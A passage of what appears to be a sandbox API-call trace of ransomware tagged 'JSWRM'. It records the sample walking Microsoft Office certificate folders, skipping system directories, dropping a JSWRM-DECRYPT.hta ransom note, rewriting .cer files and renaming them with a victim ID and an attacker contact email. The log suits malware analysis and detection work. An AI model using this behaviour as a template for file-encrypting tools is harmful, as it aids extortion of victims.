ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18aadbcf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2494f0, cFileName="Components", cAlternateFileName="COMPON~1")) returned 1 [0130.536] lstrcmpiW (lpString1="Components", lpString2=".") returned 1 [0130.536] lstrcmpiW (lpString1="Components", lpString2="..") returned 1 [0130.536] lstrcmpiW (lpString1="Components", lpString2="...") returned 1 [0130.536] lstrcmpiW (lpString1="Components", lpString2="windows") returned -1 [0130.536] lstrcmpiW (lpString1="Components", lpString2="recovery") returned -1 [0130.536] lstrcmpiW (lpString1="Components", lpString2="perflogs") returned -1 [0130.536] lstrcmpiW (lpString1="Components", lpString2="documents and settings") returned -1 [0130.536] lstrcmpiW (lpString1="Components", lpString2="$RECYCLE.BIN") returned 1 [0130.536] lstrcmpiW (lpString1="Components", lpString2="system volume information") returned -1 [0130.536] lstrcmpiW (lpString1="Components", lpString2="msocache") returned -1 [0130.536] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Components\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\components\\jswrm-decrypt.hta")) returned 0xffffffff [0130.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.537] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.537] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Components\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\components\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.538] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.538] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0130.539] CloseHandle (hObject=0x338) returned 1 [0130.539] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Components\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\components\\jswrm-decrypt.hta")) returned 0x20 [0130.539] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Components\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18aadbcf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18aadbcf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4477ff16, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName=".", cAlternateFileName="")) returned 0x232080 [0130.539] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0130.539] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x18aadbcf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18aadbcf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4477ff16, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName="..", cAlternateFileName="")) returned 1 [0130.539] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0130.539] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0130.539] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4477ff16, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4477ff16, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4477ff16, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0130.539] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0130.539] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0130.539] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0130.539] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0130.539] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0130.539] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0130.540] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0130.540] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0130.540] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0130.540] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0130.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241308, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.540] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18aadbcf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18aadbcf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2de, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName="SignedComponents.cer", cAlternateFileName="SIGNED~1.CER")) returned 1 [0130.540] lstrcmpiW (lpString1="SignedComponents.cer", lpString2=".") returned 1 [0130.540] lstrcmpiW (lpString1="SignedComponents.cer", lpString2="..") returned 1 [0130.540] lstrcmpiW (lpString1="SignedComponents.cer", lpString2="...") returned 1 [0130.540] lstrcmpiW (lpString1="SignedComponents.cer", lpString2="windows") returned -1 [0130.540] lstrcmpiW (lpString1="SignedComponents.cer", lpString2="recovery") returned 1 [0130.540] lstrcmpiW (lpString1="SignedComponents.cer", lpString2="perflogs") returned 1 [0130.540] lstrcmpiW (lpString1="SignedComponents.cer", lpString2="documents and settings") returned 1 [0130.540] lstrcmpiW (lpString1="SignedComponents.cer", lpString2="$RECYCLE.BIN") returned 1 [0130.540] lstrcmpiW (lpString1="SignedComponents.cer", lpString2="system volume information") returned -1 [0130.540] lstrcmpiW (lpString1="SignedComponents.cer", lpString2="msocache") returned 1 [0130.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignedComponents.cer", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0130.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignedComponents.cer", cchWideChar=20, lpMultiByteStr=0x241268, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignedComponents.cer", lpUsedDefaultChar=0x0) returned 20 [0130.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignedComponents.cer", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0130.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignedComponents.cer", cchWideChar=20, lpMultiByteStr=0x241038, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignedComponents.cer", lpUsedDefaultChar=0x0) returned 20 [0130.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.540] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.540] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Components\\SignedComponents.cer" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\components\\signedcomponents.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0130.541] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x345de58 | out: lpFileSize=0x345de58*=734) returned 1 [0130.541] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.541] ReadFile (in: hFile=0x264, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2d0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345de64*=0x2d0, lpOverlapped=0x0) returned 1 [0130.543] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.543] WriteFile (in: hFile=0x264, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345de60*=0x2d0, lpOverlapped=0x0) returned 1 [0130.543] CloseHandle (hObject=0x264) returned 1 [0130.543] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Components\\SignedComponents.cer" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\components\\signedcomponents.cer"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\Components\\SignedComponents.cer.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\components\\signedcomponents.cer.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0130.544] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x18aadbcf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x18aadbcf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x18ad3e4a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2de, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName="SignedComponents.cer", cAlternateFileName="SIGNED~1.CER")) returned 0 [0130.544] FindClose (in: hFindFile=0x232080 | out: hFindFile=0x232080) returned 1 [0130.545] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x447598d4, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x447598d4, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4477ff16, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x2494f0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0130.545] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0130.545] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0130.545] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0130.545] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0130.545] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0130.545] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0130.545] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0130.545] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0130.545] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0130.545] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0130.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.545] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241128, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.545] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b0f9971, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x2494f0, cFileName="ManagedObjects", cAlternateFileName="MANAGE~1")) returned 1 [0130.545] lstrcmpiW (lpString1="ManagedObjects", lpString2=".") returned 1 [0130.545] lstrcmpiW (lpString1="ManagedObjects", lpString2="..") returned 1 [0130.545] lstrcmpiW (lpString1="ManagedObjects", lpString2="...") returned 1 [0130.545] lstrcmpiW (lpString1="ManagedObjects", lpString2="windows") returned -1 [0130.545] lstrcmpiW (lpString1="ManagedObjects", lpString2="recovery") returned -1 [0130.545] lstrcmpiW (lpString1="ManagedObjects", lpString2="perflogs") returned -1 [0130.545] lstrcmpiW (lpString1="ManagedObjects", lpString2="documents and settings") returned 1 [0130.545] lstrcmpiW (lpString1="ManagedObjects", lpString2="$RECYCLE.BIN") returned 1 [0130.545] lstrcmpiW (lpString1="ManagedObjects", lpString2="system volume information") returned -1 [0130.545] lstrcmpiW (lpString1="ManagedObjects", lpString2="msocache") returned -1 [0130.545] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\ManagedObjects\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\managedobjects\\jswrm-decrypt.hta")) returned 0xffffffff [0130.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.711] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.711] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\ManagedObjects\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\managedobjects\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0130.713] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0130.713] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0130.715] CloseHandle (hObject=0x338) returned 1 [0130.715] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\ManagedObjects\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\managedobjects\\jswrm-decrypt.hta")) returned 0x20 [0130.715] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\ManagedObjects\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b0f9971, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4492378b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName=".", cAlternateFileName="")) returned 0x231e00 [0130.715] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0130.715] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b0f9971, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4492378b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName="..", cAlternateFileName="")) returned 1 [0130.715] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0130.715] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0130.715] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4492378b, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4492378b, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4492378b, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0130.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0130.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0130.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0130.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0130.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0130.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0130.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0130.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0130.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0130.715] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0130.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241010, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.715] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0130.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f70, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0130.716] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1b0f9971, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1b0f9971, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1b0f9971, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x290, dwReserved0=0x60002, dwReserved1=0x23650e, cFileName="SignedManagedObjects.cer", cAlternateFileName="SIGNED~1.CER")) returned 1 [0130.716] lstrcmpiW (lpString1="SignedManagedObjects.cer", lpString2=".") returned 1 [0130.716] lstrcmpiW (lpString1="SignedManagedObjects.cer", lpString2="..") returned 1 [0130.716] lstrcmpiW (lpString1="SignedManagedObjects.cer", lpString2="...") returned 1 [0130.716] lstrcmpiW (lpString1="SignedManagedObjects.cer", lpString2="windows") returned -1 [0130.716] lstrcmpiW (lpString1="SignedManagedObjects.cer", lpString2="recovery") returned 1 [0130.716] lstrcmpiW (lpString1="SignedManagedObjects.cer", lpString2="perflogs") returned 1 [0130.716] lstrcmpiW (lpString1="SignedManagedObjects.cer", lpString2="documents and settings") returned 1 [0130.716] lstrcmpiW (lpString1="SignedManagedObjects.cer", lpString2="$RECYCLE.BIN") returned 1 [0130.716] lstrcmpiW (lpString1="SignedManagedObjects.cer", lpString2="system volume information") returned -1 [0130.716] lstrcmpiW (lpString1="SignedManagedObjects.cer", lpString2="msocache") returned 1 [0130.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignedManagedObjects.cer", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0130.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignedManagedObjects.cer", cchWideChar=24, lpMultiByteStr=0x2411c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignedManagedObjects.cer", lpUsedDefaultChar=0x0) returned 24 [0130.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignedManagedObjects.cer", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0130.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SignedManagedObjects.cer", cchWideChar=24, lpMultiByteStr=0x2413a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SignedManagedObjects.cer", lpUsedDefaultChar=0x0) returned 24 [0130.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0130.716] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345dec4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0130.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\Certificates\\groove.net\\ManagedObjects\\SignedManagedObjects.cer" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\certificates\\groove.net\\managedobjects\\signedmanagedobjects.cer"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0130.717] GetFileSizeEx (in: hFile=0x264, 